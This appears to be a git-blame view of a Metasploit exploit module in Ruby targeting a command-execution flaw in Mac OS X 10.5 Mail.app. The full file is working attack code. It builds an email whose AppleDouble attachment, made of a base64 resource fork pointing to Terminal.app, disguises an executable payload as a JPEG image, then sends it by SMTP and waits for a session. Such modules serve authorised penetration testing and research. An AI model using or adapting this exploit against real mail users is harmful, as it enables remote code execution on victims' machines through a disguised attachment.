2007-11-21 17:30:51 +00:00
|
|
|
##
|
2014-10-17 16:47:33 +00:00
|
|
|
# This module requires Metasploit: http://metasploit.com/download
|
2013-10-15 18:50:46 +00:00
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
2007-11-21 17:30:51 +00:00
|
|
|
##
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
|
2008-10-02 05:23:59 +00:00
|
|
|
class Metasploit3 < Msf::Exploit::Remote
|
2013-08-30 21:28:54 +00:00
|
|
|
Rank = ManualRanking
|
|
|
|
|
|
|
|
#
|
|
|
|
# This module sends email messages via smtp
|
|
|
|
#
|
|
|
|
include Msf::Exploit::Remote::SMTPDeliver
|
|
|
|
include Msf::Exploit::EXE
|
|
|
|
|
|
|
|
def initialize(info = {})
|
|
|
|
super(update_info(info,
|
|
|
|
'Name' => 'Mail.app Image Attachment Command Execution',
|
|
|
|
'Description' => %q{
|
|
|
|
This module exploits a command execution vulnerability in the
|
|
|
|
Mail.app application shipped with Mac OS X 10.5.0. This flaw was
|
|
|
|
patched in 10.4 in March of 2007, but reintroduced into the final
|
|
|
|
release of 10.5.
|
|
|
|
},
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
'Author' => ['hdm', 'kf'],
|
|
|
|
'References' =>
|
|
|
|
[
|
|
|
|
['CVE', '2006-0395'],
|
|
|
|
['CVE', '2007-6165'],
|
|
|
|
['OSVDB', '40875'],
|
|
|
|
['BID', '26510'],
|
|
|
|
['BID', '16907']
|
|
|
|
],
|
|
|
|
'Stance' => Msf::Exploit::Stance::Passive,
|
|
|
|
'Payload' =>
|
|
|
|
{
|
|
|
|
'Space' => 8192,
|
|
|
|
'DisableNops' => true,
|
|
|
|
'BadChars' => "",
|
|
|
|
'Compat' =>
|
|
|
|
{
|
|
|
|
'ConnectionType' => '-bind -find',
|
|
|
|
},
|
|
|
|
},
|
2013-10-09 02:41:50 +00:00
|
|
|
'Platform' => %w{ unix osx },
|
2013-08-30 21:28:54 +00:00
|
|
|
'Targets' =>
|
|
|
|
[
|
|
|
|
[ 'Mail.app - Command Payloads',
|
|
|
|
{
|
|
|
|
'Platform' => 'unix',
|
|
|
|
'Arch' => ARCH_CMD,
|
|
|
|
'PayloadCompat' => {
|
|
|
|
'RequiredCmd' => 'generic perl ruby bash telnet',
|
|
|
|
}
|
|
|
|
}
|
|
|
|
],
|
|
|
|
[ 'Mail.app - Binary Payloads (x86)',
|
|
|
|
{
|
|
|
|
'Platform' => 'osx',
|
|
|
|
'Arch' => ARCH_X86,
|
|
|
|
}
|
|
|
|
],
|
|
|
|
[ 'Mail.app - Binary Payloads (ppc)',
|
|
|
|
{
|
|
|
|
'Platform' => 'osx',
|
|
|
|
'Arch' => ARCH_PPC,
|
|
|
|
}
|
|
|
|
],
|
|
|
|
],
|
|
|
|
'DisclosureDate' => 'Mar 01 2006'
|
|
|
|
))
|
|
|
|
|
|
|
|
end
|
|
|
|
|
|
|
|
def autofilter
|
|
|
|
false
|
|
|
|
end
|
|
|
|
|
|
|
|
def exploit
|
|
|
|
|
|
|
|
exts = ['jpg']
|
|
|
|
|
|
|
|
gext = exts[rand(exts.length)]
|
|
|
|
name = rand_text_alpha(5) + ".#{gext}"
|
|
|
|
data = rand_text_alpha(rand(32)+1)
|
|
|
|
|
|
|
|
msg = Rex::MIME::Message.new
|
|
|
|
msg.mime_defaults
|
|
|
|
msg.subject = datastore['SUBJECT'] || Rex::Text.rand_text_alpha(rand(32)+1)
|
|
|
|
msg.to = datastore['MAILTO']
|
|
|
|
msg.from = datastore['MAILFROM']
|
|
|
|
|
|
|
|
dbl = Rex::MIME::Message.new
|
|
|
|
dbl.header.set("Content-Type", "multipart/appledouble;\r\n boundary=#{dbl.bound}")
|
|
|
|
dbl.header.set("Content-Disposition", "inline")
|
|
|
|
|
|
|
|
# AppleDouble file version 2
|
|
|
|
# 3 entries - 'Finder Info', 'Real name', 'Resource Fork'
|
|
|
|
# Real Name matches msf random generated 5 character name - (I cheated ala gsub)
|
|
|
|
|
|
|
|
resfork =
|
|
|
|
"AAUWBwACAAAAAAAAAAAAAAAAAAAAAAAAAAMAAAAJAAAAPgAAAAoAAAADAAAASAAAAAkAAAACAAAA\r\n" +
|
|
|
|
"UQAABToAAAAAAAAAAAAASGVpc2UuanBnAAABAAAABQgAAAQIAAAAMgAAAAAAAAAAAAAAAAAAAAAA\r\n" +
|
|
|
|
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" +
|
|
|
|
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" +
|
|
|
|
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" +
|
|
|
|
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAQA\r\n" +
|
|
|
|
"AAAlL0FwcGxpY2F0aW9ucy9VdGlsaXRpZXMvVGVybWluYWwuYXBwAOzs7P/s7Oz/7Ozs/+zs7P/s\r\n" +
|
|
|
|
"7Oz/7Ozs/+Hh4f/h4eH/4eHh/+Hh4f/h4eH/4eHh/+Hh4f/h4eH/5ubm/+bm5v/m5ub/5ubm/+bm\r\n" +
|
|
|
|
"5v/m5ub/5ubm/+bm5v/p6en/6enp/+np6f/p6en/6enp/+np6f/p6en/6enp/+zs7P/s7Oz/7Ozs\r\n" +
|
|
|
|
"/+zs7P/s7Oz/7Ozs/+zs7P/s7Oz/7+/v/+/v7//v7+//7+/v/+/v7//v7+//7+/v/+/v7//z8/P/\r\n" +
|
|
|
|
"8/Pz//Pz8//z8/P/8/Pz//Pz8//z8/P/8/Pz//b29v/29vb/9vb2//b29v/29vb/9vb2//b29v/2\r\n" +
|
|
|
|
"9vb/+Pj4//j4+P/4+Pj/+Pj4//j4+P/4+Pj/+Pj4//j4+P/8/Pz//Pz8//z8/P/8/Pz//Pz8//z8\r\n" +
|
|
|
|
"/P/8/Pz//Pz8////////////////////////////////////////////////////////////////\r\n" +
|
|
|
|
"/////////////////////6gAAACoAAAAqAAAAKgAAACoAAAAqAAAAKgAAACoAAAAKgAAACoAAAAq\r\n" +
|
|
|
|
"AAAAKgAAACoAAAAqAAAAKgAAACoAAAADAAAAAwAAAAMAAAADAAAAAwAAAAMAAAADAAAAAwAAAAAA\r\n" +
|
|
|
|
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" +
|
|
|
|
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" +
|
|
|
|
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" +
|
|
|
|
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" +
|
|
|
|
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" +
|
|
|
|
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" +
|
|
|
|
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" +
|
|
|
|
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" +
|
|
|
|
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" +
|
|
|
|
"AAAAAQAAAAUIAAAECAAAADIAX9CsEsIAAAAcADIAAHVzcm8AAAAKAAD//wAAAAABDSF8" + "\r\n"
|
|
|
|
|
|
|
|
fork = Rex::Text.encode_base64( Rex::Text.decode_base64(resfork).gsub("Heise.jpg",name), "\r\n" )
|
|
|
|
|
|
|
|
cid = "<#{rand_text_alpha(rand(16)+16)}@#{rand_text_alpha(rand(16)+1)}.com>"
|
|
|
|
|
|
|
|
cmd = ''
|
|
|
|
|
|
|
|
if (target.arch.include?(ARCH_CMD))
|
|
|
|
cmd = Rex::Text.encode_base64(payload.encoded, "\r\n")
|
|
|
|
else
|
|
|
|
bin = generate_payload_exe
|
|
|
|
cmd = Rex::Text.encode_base64(bin, "\r\n")
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
|
|
dbl.add_part(fork , "application/applefile;\r\n name=\"#{name}\"", "base64", "inline;\r\n filename=#{name}" )
|
|
|
|
dbl.add_part(cmd , "image/jpeg;\r\n x-mac-type=0;\r\n x-unix-mode=0755;\r\n x-mac-creator=0;\r\n name=\"#{name}\"", "base64\r\nContent-Id: #{cid}", "inline;\r\n filename=#{name}" )
|
|
|
|
|
|
|
|
msg.parts << dbl
|
|
|
|
|
|
|
|
send_message(msg.to_s)
|
|
|
|
|
|
|
|
print_status("Waiting for a payload session (backgrounding)...")
|
|
|
|
end
|
2010-04-30 08:40:19 +00:00
|
|
|
|
2009-06-07 20:20:42 +00:00
|
|
|
end
|